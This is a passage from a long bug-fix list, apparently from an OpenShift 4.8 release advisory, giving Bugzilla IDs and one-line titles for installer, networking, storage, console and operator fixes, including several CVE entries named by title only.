Bump DEFAULT_DOC_URL for 4.8\n1937628 - Bump upgrade channels for 4.8\n1937658 - Description for storage class encryption during storagecluster creation needs to be updated\n1937666 - Mouseover on headline\n1937683 - Wrong icon classification of output in buildConfig when the destination is a DockerImage\n1937693 - ironic image \"/\" cluttered with files\n1937694 - [oVirt] split ovirt providerIDReconciler logic into NodeController and ProviderIDController\n1937717 - If browser default font size is 20, the layout of template screen breaks\n1937722 - OCP 4.8 vuln due to BZ 1936445\n1937929 - Operand page shows a 404:Not Found error for OpenShift GitOps Operator\n1937941 - [RFE]fix wording for favorite templates\n1937972 - Router HAProxy config file template is slow to render due to repetitive regex compilations\n1938131 - [AWS] Missing iam:ListAttachedRolePolicies permission in permissions.go\n1938321 - Cannot view PackageManifest objects in YAML on \u0027Home \u003e Search\u0027 page nor \u0027CatalogSource details \u003e Operators tab\u0027\n1938465 - thanos-querier should set a CPU request on the thanos-query container\n1938466 - packageserver deployment sets neither CPU or memory request on the packageserver container\n1938467 - The default cluster-autoscaler should get default cpu and memory requests if user omits them\n1938468 - kube-scheduler-operator has a container without a CPU request\n1938492 - Marketplace extract container does not request CPU or memory\n1938493 - machine-api-operator declares restrictive cpu and memory limits where it should not\n1938636 - Can\u0027t set the loglevel of the container: cluster-policy-controller and kube-controller-manager-recovery-controller\n1938903 - Time range on dashboard page will be empty after drog and drop mouse in the graph\n1938920 - ovnkube-master/ovs-node DaemonSets should use maxUnavailable: 10%\n1938947 - Update blocked from 4.6 to 4.7 when using spot/preemptible instances\n1938949 - [VPA] Updater failed to trigger evictions due to \"vpa-admission-controller\" not found\n1939054 - machine healthcheck kills aws spot instance before generated\n1939060 - CNO: nodes and masters are upgrading simultaneously\n1939069 - Add source to vm template silently failed when no storage class is defined in the cluster\n1939103 - CVE-2021-28092 nodejs-is-svg: ReDoS via malicious string\n1939168 - Builds failing for OCP 3.11 since PR#25 was merged\n1939226 - kube-apiserver readiness probe appears to be hitting /healthz, not /readyz\n1939227 - kube-apiserver liveness probe appears to be hitting /healthz, not /livez\n1939232 - CI tests using openshift/hello-world broken by Ruby Version Update\n1939270 - fix co upgradeableFalse status and reason\n1939294 - OLM may not delete pods with grace period zero (force delete)\n1939412 - missed labels for thanos-ruler pods\n1939485 - CVE-2021-20291 containers/storage: DoS via malicious image\n1939547 - Include container=\"POD\" in resource queries\n1939555 - VSphereProblemDetectorControllerDegraded: context canceled during upgrade to 4.8.0\n1939573 - after entering valid git repo url on add flow page, throwing warning message instead Validated\n1939580 - Authentication operator is degraded during 4.8 to 4.8 upgrade and normal 4.8 e2e runs\n1939606 - Attempting to put a host into maintenance mode warns about Ceph cluster health, but no storage cluster problems are apparent\n1939661 - support new AWS region ap-northeast-3\n1939726 - clusteroperator/network should not change condition/Degraded during normal serial test execution\n1939731 - Image registry operator reports unavailable during normal serial run\n1939734 - Node Fanout Causes Excessive WATCH Secret Calls, Taking Down Clusters\n1939740 - dual stack nodes with OVN single ipv6 fails on bootstrap phase\n1939752 - ovnkube-master sbdb container does not set requests on cpu or memory\n1939753 - Delete HCO is stucking if there is still VM in the cluster\n1939815 - Change the Warning Alert for Encrypted PVs in Create StorageClass(provisioner:RBD) page\n1939853 - [DOC] Creating manifests API should not allow folder in the \"file_name\"\n1939865 - GCP PD CSI driver does not have CSIDriver instance\n1939869 - [e2e][automation] Add annotations to datavolume for HPP\n1939873 - Unlimited number of characters accepted for base domain name\n1939943 - `cluster-kube-apiserver-operator check-endpoints` observed a panic: runtime error: invalid memory address or nil pointer dereference\n1940030 - cluster-resource-override: fix spelling mistake for run-level match expression in webhook configuration\n1940057 - Openshift builds should use a wach instead of polling when checking for pod status\n1940142 - 4.6-\u003e4.7 updates stick on OpenStackCinderCSIDriverOperatorCR_OpenStackCinderDriverControllerServiceController_Deploying\n1940159 - [OSP] cluster destruction fails to remove router in BYON (with provider network) with Kuryr as primary network\n1940206 - Selector and VolumeTableRows not i18ned\n1940207 - 4.7-\u003e4.6 rollbacks stuck on prometheusrules admission webhook \"no route to host\"\n1940314 - Failed to get type for Dashboard Kubernetes / Compute Resources / Namespace (Workloads)\n1940318 - No data under \u0027Current Bandwidth\u0027 for Dashboard \u0027Kubernetes / Networking / Pod\u0027\n1940322 - Split of dashbard  is wrong, many Network parts\n1940337 - rhos-ipi installer fails with not clear message when openstack tenant doesn\u0027t have flavors needed for compute machines\n1940361 - [e2e][automation] Fix vm action tests with storageclass HPP\n1940432 - Gather datahubs.installers.datahub.sap.com resources from SAP clusters\n1940488 - After fix for CVE-2021-3344, Builds do not mount node entitlement keys\n1940498 - pods may fail to add logical port due to lr-nat-del/lr-nat-add error messages\n1940499 - hybrid-overlay not logging properly before exiting due to an error\n1940518 - Components in bare metal components lack resource requests\n1940613 - CVE-2021-27292 nodejs-ua-parser-js: ReDoS via malicious User-Agent header\n1940704 - prjquota is dropped from rootflags if rootfs is reprovisioned\n1940755 - [Web-console][Local Storage] LocalVolumeSet could not be created from web-console without detail error info\n1940865 - Add BareMetalPlatformType into e2e upgrade service unsupported list\n1940876 - Components in ovirt components lack resource requests\n1940889 - Installation failures in OpenStack release jobs\n1940933 - [sig-arch] Check if alerts are firing during or after upgrade success: AggregatedAPIDown on v1beta1.metrics.k8s.io\n1940939 - Wrong Openshift node IP as kubelet setting VIP as node IP\n1940940 - csi-snapshot-controller goes unavailable when machines are added removed to cluster\n1940950 - vsphere: client/bootstrap CSR double create\n1940972 - vsphere: [4.6] CSR approval delayed for unknown reason\n1941000 - cinder storageclass creates persistent volumes with wrong label failure-domain.beta.kubernetes.io/zone in multi availability zones architecture on OSP 16. \n1941334 - [RFE] Cluster-api-provider-ovirt should handle auto pinning policy\n1941342 - Add `kata-osbuilder-generate.service` as part of the default presets\n1941456 - Multiple pods stuck in ContainerCreating status with the message \"failed to create container for [kubepods burstable podxxx] : dbus: connection closed by user\" being seen in the journal log\n1941526 - controller-manager-operator: Observed a panic: nil pointer dereference\n1941592 - HAProxyDown not Firing\n1941606 - [assisted operator] Assisted Installer Operator CSV related images should be digests for icsp\n1941625 - Developer -\u003e Topology - i18n misses\n1941635 - Developer -\u003e Monitoring - i18n misses\n1941636 - BM worker nodes deployment with virtual media failed while trying to clean raid\n1941645 - Developer -\u003e Builds - i18n misses\n1941655 - Developer -\u003e Pipelines - i18n misses\n1941667 - Developer -\u003e Project - i18n misses\n1941669 - Developer -\u003e ConfigMaps - i18n misses\n1941759 - Errored pre-flight checks should not prevent install\n1941798 - Some details pages don\u0027t have internationalized ResourceKind labels\n1941801 - Many filter toolbar dropdowns haven\u0027t been internationalized\n1941815 - From the web console the terminal can no longer connect after using leaving and returning to the terminal view\n1941859 - [assisted operator] assisted pod deploy first time in error state\n1941901 - Toleration merge logic does not account for multiple entries with the same key\n1941915 - No validation against template name in boot source customization\n1941936 - when setting parameters in containerRuntimeConfig, it will show incorrect information on its description\n1941980 - cluster-kube-descheduler operator is broken when upgraded from 4.7 to 4.8\n1941990 - Pipeline metrics endpoint changed in osp-1.4\n1941995 - fix backwards incompatible trigger api changes in osp1.4\n1942086 - Administrator -\u003e Home - i18n misses\n1942117 - Administrator -\u003e Workloads - i18n misses\n1942125 - Administrator -\u003e Serverless - i18n misses\n1942193 - Operand creation form - broken/cutoff blue line on the Accordion component (fieldGroup)\n1942207 - [vsphere] hostname are changed when upgrading from 4.6 to 4.7.x causing upgrades to fail\n1942271 - Insights operator doesn\u0027t gather pod information from openshift-cluster-version\n1942375 - CRI-O failing with error \"reserving ctr name\"\n1942395 - The status is always \"Updating\" on dc detail page after deployment has failed. \n1942521 - [Assisted-4.7] [Staging][OCS] Minimum memory for selected role is failing although minimum OCP requirement satisfied\n1942522 - Resolution fails to sort channel if inner entry does not satisfy predicate\n1942536 - Corrupted image preventing containers from starting\n1942548 - Administrator -\u003e Networking - i18n misses\n1942553 - CVE-2021-22133 go.elastic.co/apm: leaks sensitive HTTP headers during panic\n1942555 - Network policies in ovn-kubernetes don\u0027t support external traffic from router when the endpoint publishing strategy is HostNetwork\n1942557 - Query is reporting \"no datapoint\" when label cluster=\"\" is set but work when the label is removed or when running directly in Prometheus\n1942608 - crictl cannot list the images with an error: error locating item named \"manifest\" for image with ID\n1942614 - Administrator -\u003e Storage - i18n misses\n1942641 - Administrator -\u003e Builds - i18n misses\n1942673 - Administrator -\u003e Pipelines - i18n misses\n1942694 - Resource names with a colon do not display property in the browser window title\n1942715 - Administrator -\u003e User Management - i18n misses\n1942716 - Quay Container Security operator has Medium \u003c-\u003e Low colors reversed\n1942725 - [SCC] openshift-apiserver degraded when creating new pod after installing Stackrox which creates a less privileged SCC [4.8]\n1942736 - Administrator -\u003e Administration - i18n misses\n1942749 - Install Operator form should use info icon for popovers\n1942837 - [OCPv4.6] unable to deploy pod with unsafe sysctls\n1942839 - Windows VMs fail to start on air-gapped environments\n1942856 - Unable to assign nodes for EgressIP even if the egress-assignable label is set\n1942858 - [RFE]Confusing detach volume UX\n1942883 - AWS EBS CSI driver does not support partitions\n1942894 - IPA error when provisioning masters due to an error from ironic.conductor - /dev/sda is busy\n1942935 - must-gather improvements\n1943145 - vsphere: client/bootstrap CSR double create\n1943175 - unable to install IPI PRIVATE OpenShift cluster in Azure due to organization policies (set azure storage account TLS version default to 1.2)\n1943208 - CVE-2021-23362 nodejs-hosted-git-info: Regular Expression denial of service via shortcutMatch in fromUrl()\n1943219 - unable to install IPI PRIVATE OpenShift cluster in Azure - SSH access from the Internet should be blocked\n1943224 - cannot upgrade openshift-kube-descheduler from 4.7.2 to latest\n1943238 - The conditions table does not occupy 100% of the width. \n1943258 - [Assisted-4.7][Staging][Advanced Networking] Cluster install fails while waiting for control plane\n1943314 - [OVN SCALE] Combine Logical Flows inside Southbound DB. \n1943315 - avoid workload disruption for ICSP changes\n1943320 - Baremetal node loses connectivity with bonded interface and OVNKubernetes\n1943329 - TLSSecurityProfile missing from KubeletConfig CRD Manifest\n1943356 - Dynamic plugins surfaced in the UI should be referred to as \"Console plugins\"\n1943539 - crio-wipe is failing to start \"Failed to shutdown storage before wiping: A layer is mounted: layer is in use by a container\"\n1943543 - DeploymentConfig Rollback doesn\u0027t reset params correctly\n1943558 - [assisted operator] Assisted Service pod unable to reach self signed local registry in disco environement\n1943578 - CoreDNS caches NXDOMAIN responses for up to 900 seconds\n1943614 - add bracket logging on openshift/builder calls into buildah to assist test-platform team triage\n1943637 - upgrade from ocp 4.5 to 4.6 does not clear SNAT rules on ovn\n1943649 - don\u0027t use hello-openshift for network-check-target\n1943667 - KubeDaemonSetRolloutStuck fires during upgrades too often because it does not accurately detect progress\n1943719 - storage-operator/vsphere-problem-detector causing upgrades to fail that would have succeeded in past versions\n1943804 - API server on AWS takes disruption between 70s and 110s after pod begins termination via external LB\n1943845 - Router pods should have startup probes configured\n1944121 - OVN-kubernetes references AddressSets after deleting them, causing ovn-controller errors\n1944160 - CNO: nbctl daemon should log reconnection info\n1944180 - OVN-Kube Master does not release election lock on shutdown\n1944246 - Ironic fails to inspect and move node to \"manageable\u0027 but get bmh remains in \"inspecting\"\n1944268 - openshift-install AWS SDK is missing endpoints for the ap-northeast-3 region\n1944509 - Translatable texts without context in ssh expose component\n1944581 - oc project not works with cluster proxy\n1944587 - VPA could not take actions based on the recommendation when min-replicas=1\n1944590 - The field name \"VolumeSnapshotContent\" is wrong on VolumeSnapshotContent detail page\n1944602 - Consistant fallures of features/project-creation.feature Cypress test in CI\n1944631 - openshif authenticator should not accept non-hashed tokens\n1944655 - [manila-csi-driver-operator] openstack-manila-csi-nodeplugin pods stucked with \".. still connecting to unix:///var/lib/kubelet/plugins/csi-nfsplugin/csi.sock\"\n1944660 - dm-multipath race condition on bare metal causing /boot partition mount failures\n1944674 - Project field become to \"All projects\" and disabled in \"Review and create virtual machine\" step in devconsole\n1944678 - Whereabouts IPAM CNI duplicate IP addresses assigned to pods\n1944761 - field level help instances do not use common util component \u003cFieldLevelHelp\u003e\n1944762 - Drain on worker node during an upgrade fails due to PDB set for image registry pod when only a single replica is present\n1944763 - field level help instances do not use common util component \u003cFieldLevelHelp\u003e\n1944853 - Update to nodejs \u003e=14.15.4 for ARM\n1944974 - Duplicate KubeControllerManagerDown/KubeSchedulerDown alerts\n1944986 - Clarify the ContainerRuntimeConfiguration cr description on the validation\n1945027 - Button \u0027Copy SSH Command\u0027 does not work\n1945085 - Bring back API data in etcd test\n1945091 - In k8s 1.21 bump Feature:IPv6DualStack tests are disabled\n1945103 - \u0027User credentials\u0027 shows even the VM is not running\n1945104 - In k8s 1.21 bump \u0027[sig-storage] [cis-hostpath] [Testpattern: Generic Ephemeral-volume\u0027 tests are disabled\n1945146 - Remove pipeline Tech preview badge for pipelines GA operator\n1945236 - Bootstrap ignition shim doesn\u0027t follow proxy settings\n1945261 - Operator dependency not consistently chosen from default channel\n1945312 - project deletion does not reset UI project context\n1945326 - console-operator: does not check route health periodically\n1945387 - Image Registry deployment should have 2 replicas and hard anti-affinity rules\n1945398 - 4.8 CI failure: [Serial] [sig-auth][Feature:OAuthServer] [RequestHeaders] [IdP] test RequestHeaders IdP [Suite:openshift/conformance/serial]\n1945431 - alerts: SystemMemoryExceedsReservation triggers too quickly\n1945443 - operator-lifecycle-manager-packageserver flaps Available=False with no reason or message\n1945459 - CVE-2020-28469 nodejs-glob-parent: Regular expression denial of service\n1945548 - catalog resource update failed if spec.secrets set to \"\"\n1945584 - Elasticsearch  operator fails to install on 4.8 cluster on ppc64le/s390x\n1945599 - Optionally set KERNEL_VERSION and RT_KERNEL_VERSION\n1945630 - Pod log filename no longer in \u003cpod-name\u003e-\u003ccontainer-name\u003e.log format\n1945637 - QE- Automation- Fixing smoke test suite for pipeline-plugin\n1945646 - gcp-routes.sh running as initrc_t unnecessarily\n1945659 - [oVirt] remove ovirt_cafile from ovirt-credentials secret\n1945677 - Need ACM Managed Cluster Info metric enabled for OCP monitoring telemetry\n1945687 - Dockerfile needs updating to new container CI registry\n1945700 - Syncing boot mode after changing device should be restricted to Supermicro\n1945816 - \" Ingresses \" should be kept in English for Chinese\n1945818 - Chinese translation issues: Operator should be the same with English `Operators`\n1945849 - Unnecessary series churn when a new version of kube-state-metrics is rolled out\n1945910 - [aws] support byo iam roles for instances\n1945948 - SNO: pods can\u0027t reach ingress when the ingress uses a different IPv6. \n1946079 - Virtual master is not getting an IP address\n1946097 - [oVirt] oVirt credentials secret contains unnecessary \"ovirt_cafile\"\n1946119 - panic parsing install-config\n1946243 - No relevant error when pg limit is reached in block pools page\n1946307 - [CI] [UPI] use a standardized and reliable way to install google cloud SDK in UPI image\n1946320 - Incorrect error message in Deployment Attach Storage Page\n1946449 - [e2e][automation] Fix cloud-init tests as UI changed\n1946458 - Edit Application action overwrites Deployment envFrom values on save\n1946459 - In bare metal IPv6 environment, [sig-storage] [Driver: nfs] tests are failing in CI. \n1946479 - In k8s 1.21 bump BoundServiceAccountTokenVolume is disabled by default\n1946497 - local-storage-diskmaker pod logs \"DeviceSymlinkExists\" and \"not symlinking, could not get lock: \u003cnil\u003e\"\n1946506 - [on-prem] mDNS plugin no longer needed\n1946513 - honor use specified system reserved with auto node sizing\n1946540 - auth operator: only configure webhook authenticators for internal auth when oauth-apiserver pods are ready\n1946584 - Machine-config controller fails to generate MC, when machine config pool with dashes in name presents under the cluster\n1946607 - etcd readinessProbe is not reflective of actual readiness\n1946705 - Fix issues with \"search\" capability in the Topology Quick Add component\n1946751 - DAY2 Confusing event when trying to add hosts to a cluster that completed installation\n1946788 - Serial tests are broken because of router\n1946790 - Marketplace operator flakes Available=False OperatorStarting during updates\n1946838 - Copied CSVs show up as adopted components\n1946839 - [Azure] While mirroring images to private registry throwing error: invalid character \u0027\u003c\u0027 looking for beginning of value\n1946865 - no \"namespace:kube_pod_container_resource_requests_cpu_cores:sum\" and \"namespace:kube_pod_container_resource_requests_memory_bytes:sum\" metrics\n1946893 - the error messages are inconsistent in DNS status conditions if the default service IP is taken\n1946922 - Ingress details page doesn\u0027t show referenced secret name and link\n1946929 - the default dns operator\u0027s Progressing status is always True and cluster operator dns Progressing status is False\n1947036 - \"failed to create Matchbox client or connect\" on e2e-metal jobs or metal clusters via cluster-bot\n1947066 - machine-config-operator pod crashes when noProxy is *\n1947067 - [Installer] Pick up upstream fix for installer console output\n1947078 - Incorrect skipped status for conditional tasks in the pipeline run\n1947080 - SNO IPv6 with \u0027temporary 60-day domain\u0027 option fails with IPv4 exception\n1947154 - [master] [assisted operator] Unable to re-register an SNO instance if deleting CRDs during install\n1947164 - Print \"Successfully pushed\" even if the build push fails. \n1947176 - OVN-Kubernetes leaves stale AddressSets around if the deletion was missed. \n1947293 - IPv6 provision addresses range larger then /64 prefix (e.g. /48)\n1947311 - When adding a new node to localvolumediscovery UI does not show pre-existing node name\u0027s\n1947360 - [vSphere csi driver operator] operator pod runs as \u201cBestEffort\u201d qosClass\n1947371 - [vSphere csi driver operator] operator doesn\u0027t create \u201ccsidriver\u201d instance\n1947402 - Single Node cluster upgrade: AWS EBS CSI driver deployment is stuck on rollout\n1947478 - discovery v1 beta1 EndpointSlice is deprecated in Kubernetes 1.21 (OCP 4.8)\n1947490 - If Clevis on a managed LUKs volume with Ignition enables, the system will fails to automatically open the LUKs volume on system boot\n1947498 - policy v1 beta1 PodDisruptionBudget is deprecated in Kubernetes 1.21 (OCP 4.8)\n1947663 - disk details are not synced in web-console\n1947665 - Internationalization values for ceph-storage-plugin should be in file named after plugin\n1947684 - MCO on SNO sometimes has rendered configs and sometimes does not\n1947712 - [OVN] Many faults and Polling interval stuck for 4 seconds every roughly 5 minutes intervals. \n1947719 - 8 APIRemovedInNextReleaseInUse info alerts display\n1947746 - Show wrong kubernetes version from kube-scheduler/kube-controller-manager operator pods\n1947756 - [azure-disk-csi-driver-operator] Should allow more nodes to be updated simultaneously for speeding up cluster upgrade\n1947767 - [azure-disk-csi-driver-operator] Uses the same storage type in the sc created by it as the default sc?\n1947771 - [kube-descheduler]descheduler operator pod should not run as \u201cBestEffort\u201d qosClass\n1947774 - CSI driver operators use \"Always\" imagePullPolicy in some containers\n1947775 - [vSphere csi driver operator] doesn\u2019t use the downstream images from payload. \n1947776 - [vSphere csi driver operator] Should allow more nodes to be updated simultaneously for speeding up cluster upgrade\n1947779 - [LSO] Should allow more nodes to be updated simultaneously for speeding up LSO upgrade\n1947785 - Cloud Compute: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won\u0027t access APIs that trigger APIRemovedInNextReleaseInUse alert\n1947789 - Console: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won\u0027t access APIs that trigger APIRemovedInNextReleaseInUse alert\n1947791 - MCO: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won\u0027t access APIs that trigger APIRemovedInNextReleaseInUse alert\n1947793 - DevEx: APIRemovedInNextReleaseInUse info alerts display\n1947794 - OLM: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component does not trigger APIRemovedInNextReleaseInUse alert\n1947795 - Networking: APIRemovedInNextReleaseInUse info alerts display\n1947797 - CVO: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won\u0027t access APIs that trigger APIRemovedInNextReleaseInUse alert\n1947798 - Images: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won\u0027t access APIs that trigger APIRemovedInNextReleaseInUse alert\n1947800 - Ingress: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won\u0027t access APIs that trigger APIRemovedInNextReleaseInUse alert\n1947801 - Kube Storage Version Migrator APIRemovedInNextReleaseInUse info alerts display\n1947803 - Openshift Apiserver: APIRemovedInNextReleaseInUse info alerts display\n1947806 - Re-enable h2spec, http/2 and grpc-interop e2e tests in openshift/origin\n1947828 - `download it` link should save pod log in \u003cpod-name\u003e-\u003ccontainer-name\u003e.log format\n1947866 - disk.csi.azure.com.spec.operatorLogLevel is not updated when CSO loglevel  is changed\n1947917 - Egress Firewall does not reliably apply firewall rules\n1947946 - Operator upgrades can delete existing CSV before completion\n1948011 - openshift-controller-manager constantly reporting type \"Upgradeable\" status Unknown\n1948012 - service-ca constantly reporting type \"Upgradeable\" status Unknown\n1948019 - [4.8] Large number of requests to the infrastructure cinder volume service\n1948022 - Some on-prem namespaces missing from must-gather\n1948040 - cluster-etcd-operator: etcd is using deprecated logger\n1948082 - Monitoring should not set Available=False with no reason on updates\n1948137 - CNI DEL not called on node reboot - OCP 4 CRI-O. \n1948232 - DNS operator performs spurious updates in response to API\u0027s defaulting of daemonset\u0027s maxSurge and service\u0027s ipFamilies and ipFamilyPolicy fields\n1948311 - Some jobs failing due to excessive watches: the server has received too many requests and has asked us to try again later\n1948359 - [aws] shared tag was not removed from user provided IAM role\n1948410 - [LSO] Local Storage Operator uses imagePullPolicy as \"Always\"\n1948415 - [vSphere csi driver operator] clustercsidriver.spec.logLevel doesn\u0027t take effective after changing\n1948427 - No action is triggered after click \u0027Continue\u0027 button on \u0027Show community Operator\u0027 windows\n1948431 - TechPreviewNoUpgrade does not enable CSI migration\n1948436 - The outbound traffic was broken intermittently after shutdown one egressIP node\n1948443 - OCP 4.8 nightly still showing v1.20 even after 1.21 merge\n1948471 - [sig-auth][Feature:OpenShiftAuthorization][Serial] authorization  TestAuthorizationResourceAccessReview should succeed [Suite:openshift/conformance/serial]\n1948505 - [vSphere csi driver operator] vmware-vsphere-csi-driver-operator pod restart every 10 minutes\n1948513 - get-resources.sh doesn\u0027t honor the no_proxy settings\n1948524 - \u0027DeploymentUpdated\u0027 Updated Deployment.apps/downloads -n openshift-console because it changed message is printed every minute\n1948546 - VM of worker is in error state when a network has port_security_enabled=False\n1948553 - When setting etcd spec.LogLevel is not propagated to etcd operand\n1948555 - A lot of events \"rpc error: code = DeadlineExceeded desc = context deadline exceeded\" were seen in azure disk csi driver verification test\n1948563 - End-to-End Secure boot deployment fails \"Invalid value for input variable\"\n1948582 - Need ability to specify local gateway mode in CNO config\n1948585 - Need a CI jobs to test local gateway mode with bare metal\n1948592 - [Cluster Network Operator] Missing Egress Router Controller\n1948606 - DNS e2e test fails \"[sig-arch] Only known images used by tests\" because it does not use a known image\n1948610 - External Storage [Driver: disk.csi.azure.com] [Testpattern: Dynamic PV (block volmode)] multiVolume [Slow] should access to two volumes with the same volume mode and retain data across pod recreation on the same node [LinuxOnly]\n1948626 - TestRouteAdmissionPolicy e2e test is failing often\n1948628 - ccoctl needs to plan for future (non-AWS) platform support in the CLI\n1948634 - upgrades: allow upgrades without version change\n1948640 - [Descheduler] operator log reports key failed with : kubedeschedulers.operator.openshift.io \"cluster\" not found\n1948701 - unneeded CCO alert already covered by CVO\n1948703 - p\u0026f: probes should not get 429s\n1948705 - [assisted operator] SNO deployment fails - ClusterDeployment shows `bootstrap.ign was not found`\n1948706 - Cluster Autoscaler Operator manifests missing annotation for ibm-cloud-managed profile\n1948708 - cluster-dns-operator includes a deployment with node selector of masters for the IBM cloud managed profile\n1948711 - thanos querier and prometheus-adapter should have 2 replicas\n1948714 - cluster-image-registry-operator targets master nodes in ibm-cloud-managed-profile\n1948716 - cluster-ingress-operator deployment targets master nodes for ibm-cloud-managed profile\n1948718 - cluster-network-operator deployment manifest for ibm-cloud-managed profile contains master node selector\n1948719 - Machine API components should use 1.21 dependencies\n1948721 - cluster-storage-operator deployment targets master nodes for ibm-cloud-managed profile\n1948725 - operator lifecycle manager does not include profile annotations for ibm-cloud-managed\n1948763 - CVE-2021-23368 nodejs-postcss: Regular expression denial of service during source map parsing\n1948771 - ~50% of GCP upgrade jobs in 4.8 failing with \"AggregatedAPIDown\" alert on packages.coreos.com\n1948782 - Stale references to the single-node-production-edge cluster profile\n1948787 - secret.StringData shouldn\u0027t be used for reads\n1948788 - Clicking an empty metrics graph (when there is no data) should still open metrics viewer\n1948789 - Clicking on a metrics graph should show request and limits queries as well on the resulting metrics page\n1948919 - Need minor update in message on channel modal\n1948923 - [aws] installer forces the platform.aws.amiID option to be set, while installing a cluster into GovCloud or C2S region\n1948926 - Memory Usage of Dashboard \u0027Kubernetes / Compute Resources / Pod\u0027 contain wrong CPU query\n1948936 - [e2e][automation][prow] Prow script point to deleted resource\n1948943 - (release-4.8) Limit the number of collected pods in the workloads gatherer\n1948953 - Uninitialized cloud provider error when provisioning a cinder volume\n1948963 - [RFE] Cluster-api-provider-ovirt should handle hugepages\n1948966 - Add the ability to run a gather done by IO via a Kubernetes Job\n1948981 - Align dependencies and libraries with latest ironic code\n1948998 - style fixes by GoLand and golangci-lint\n1948999 - Can not assign multiple EgressIPs to a namespace by using automatic way. \n1949019 - PersistentVolumes page cannot sync project status automatically which will block user to create PV\n1949022 - Openshift 4 has a zombie problem\n1949039 - Wrong env name to get podnetinfo for hugepage in app-netutil\n1949041 - vsphere: wrong image names in bundle\n1949042 - [sig-network-edge][Conformance][Area:Networking][Feature:Router] The HAProxy router should pass the http2 tests  (on OpenStack)\n1949050 - Bump k8s to latest 1.21\n1949061 - [assisted operator][nmstate] Continuous attempts to reconcile InstallEnv  in the case of invalid NMStateConfig\n1949063 - [sig-network] Conntrack should be able to preserve UDP traffic when server pod cycles for a NodePort service\n1949075 - Extend openshift/api for Add card customization\n1949093 - PatternFly v4.96.2 regression results in a.pf-c-button hover issues\n1949096 - Restore private git clone tests\n1949099 - network-check-target code cleanup\n1949105 - NetworkPolicy ... should enforce ingress policy allowing any port traffic to a server on a specific protocol\n1949145 - Move openshift-user-critical priority class to CCO\n1949155 - Console doesn\u0027t correctly check for favorited or last namespace on load if project picker used\n1949180 - Pipelines plugin model kinds aren\u0027t picked up by parser\n1949202 - sriov-network-operator not available from operatorhub on ppc64le\n1949218 - ccoctl not included in container image\n1949237 - Bump OVN: Lots of conjunction warnings in ovn-controller container logs\n1949277 - operator-marketplace: deployment manifests for ibm-cloud-managed profile have master node selectors\n1949294 - [assisted operator] OPENSHIFT_VERSIONS in assisted operator subscription does not propagate\n1949306 - need a way to see top API accessors\n1949313 - Rename vmware-vsphere-* images to vsphere-* images before 4.8 ships\n1949316 - BaremetalHost resource automatedCleaningMode ignored due to outdated vendoring\n1949347 - apiserver-watcher support for dual-stack\n1949357 - manila-csi-controller pod not running due to secret lack(in another ns)\n1949361 - CoreDNS resolution failure for external hostnames with \"A: dns: overflow unpacking uint16\"\n1949364 - Mention scheduling profiles in scheduler operator repository\n1949370 - Testability of: Static pod installer controller deadlocks with non-existing installer pod, WAS: kube-apisrever of clsuter operator always with incorrect status due to pleg error\n1949384 - Edit Default Pull Secret modal - i18n misses\n1949387 - Fix the typo in auto node sizing script\n1949404 - label selector on pvc creation page - i18n misses\n1949410 - The referred role doesn\u0027t exist if create rolebinding from rolebinding tab of role page\n1949411 - VolumeSnapshot, VolumeSnapshotClass and VolumeSnapshotConent Details tab is not translated - i18n misses\n1949413 - Automatic boot order setting is done incorrectly when using by-path style device names\n1949418 - Controller factory workers should always restart on panic()\n1949419 - oauth-apiserver logs \"[SHOULD NOT HAPPEN] failed to update managedFields for authentication.k8s.io/v1, Kind=TokenReview: failed to convert new object (authentication.k8s.io/v1, Kind=TokenReview)\"\n1949420 - [azure csi driver operator] pvc.status.capacity and pv.spec.capacity are processed not the same as in-tree plugin\n1949435 - ingressclass controller doesn\u0027t recreate the openshift-default ingressclass after deleting it\n1949480 - Listeners timeout are constantly being updated\n1949481 - cluster-samples-operator restarts approximately two times per day and logs too many same messages\n1949509 - Kuryr should manage API LB instead of CNO\n1949514 - URL is not visible for routes at narrow screen widths\n1949554 - Metrics of vSphere CSI driver sidecars are not collected\n1949582 - OCP v4.7 installation with OVN-Kubernetes fails with error \"egress bandwidth restriction -1 is not equals\"\n1949589 - APIRemovedInNextEUSReleaseInUse Alert Missing\n1949591 - Alert does not catch removed api usage during end-to-end tests. \n1949593 - rename DeprecatedAPIInUse alert to APIRemovedInNextReleaseInUse\n1949612 - Install with 1.21 Kubelet is spamming logs with failed to get stats failed command \u0027du\u0027\n1949626 - machine-api fails to create AWS client in new regions\n1949661 - Kubelet Workloads Management changes for OCPNODE-529\n1949664 - Spurious keepalived liveness probe failures\n1949671 - System services such as openvswitch are stopped before pod containers on system shutdown or reboot\n1949677 - multus is the first pod on a new node and the last to go ready\n1949711 - cvo unable to reconcile deletion of openshift-monitoring namespace\n1949721 - Pick 99237: Use the audit ID of a request for better correlation\n1949741 - Bump golang version of cluster-machine-approver\n1949799 - ingresscontroller should deny the setting when spec.tuningOptions.threadCount exceed 64\n1949810 - OKD 4.7  unable to access Project  Topology View\n1949818 - Add e2e test to perform MCO operation Single Node OpenShift\n1949820 - Unable to use `oc adm top is` shortcut when asking for `imagestreams`\n1949862 - The ccoctl tool hits the panic sometime when running the delete subcommand\n1949866 - The ccoctl fails to create authentication file when running the command `ccoctl aws create-identity-provider` with `--output-dir` parameter\n1949880 - adding providerParameters.gcp.clientAccess to existing ingresscontroller doesn\u0027t work\n1949882 - service-idler build error\n1949898 - Backport RP#848 to OCP 4.8\n1949907 - Gather summary of PodNetworkConnectivityChecks\n1949923 - some defined rootVolumes zones not used on installation\n1949928 - Samples Operator updates break CI tests\n1949935 - Fix  incorrect access review check on start pipeline kebab action\n1949956 - kaso: add minreadyseconds to ensure we don\u0027t have an LB outage on kas\n1949967 - Update Kube dependencies in MCO to 1.21\n1949972 - Descheduler metrics: populate build info data and make the metrics entries more readeable\n1949978 - [sig-network-edge][Conformance][Area:Networking][Feature:Router] The HAProxy router should pass the h2spec conformance tests [Suite:openshift/conformance/parallel/minimal]\n1949990 - (release-4.8) Extend the OLM operator gatherer to include CSV display name\n1949991 - openshift-marketplace pods are crashlooping\n1950007 - [CI] [UPI] easy_install is not reliable enough to be used in an image\n1950026 - [Descheduler] Need better way to handle evicted pod count for 